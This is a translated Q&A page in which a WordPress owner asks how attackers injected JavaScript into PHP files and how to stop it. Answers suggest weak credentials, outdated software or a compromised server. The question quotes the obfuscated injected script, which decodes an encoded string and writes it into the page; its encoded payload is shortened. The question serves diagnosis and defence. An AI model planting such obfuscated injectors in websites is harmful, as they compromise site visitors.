web-dev-qa-db-fra.com

Comment les attaquants écrivent des scripts dans mes fichiers php?

J'ai un blog créé avec Wordpress, maintenant j'ai un problème. Les attaquants écrivent des codes javascript dans mes fichiers.

Supposons que j'ai des trous dans mes scripts de plugin, mais comment peuvent-ils écrire dans des fichiers php?

voici une partie de la liste des fichiers php, dans lesquels ils écrivent le script (index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ...)

et c'est le javascript qu'ils écrivent dans

<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>

Comment puis-je prévenir de telles attaques?

Je n'ai aucune expérience avec WordPress, donc toute aide sera très gentille.

Merci beaucoup

phpsecurityhacked
4
Syom

Bonjour @ Syom:

Souvent, les pirates informatiques y ont accès car vous utilisez le nom "admin" de votre administrateur et vous disposez d'un mot de passe facile à pirater. Ou parce que vous ne mettez pas à jour votre logiciel et qu'il exploite certaines des failles de sécurité qui ont été trouvées et corrigées.

Voici un ensemble de diapositives expliquant comment sécuriser votre site WordPress qui vient d'être présenté au WordCamp Phoenix le week-end dernier:

Voici quelques articles de blog d'Otto sur le sujet:

5
MikeSchinkel

Il y a plusieurs façons possibles:

  • connexion FTP/SSH compromise;
  • connexion WordPress compromise;
  • configuration de sécurité du serveur défectueuse;
  • serveur compromis;
  • une sorte de porte dérobée installée;
  • etc.

Vous devez contacter immédiatement le service d’hébergement. Cela dépend de la qualité et du prix de votre hébergement.

Sinon, si vous n'êtes pas confiant dans les compétences techniques, je vous suggère de rechercher quelqu'un qui s'occupe du nettoyage professionnel des blogs piratés, sinon vous ne serez pas sûr des spécificités du piratage et de la sécurité à l'avenir.

1
Rarst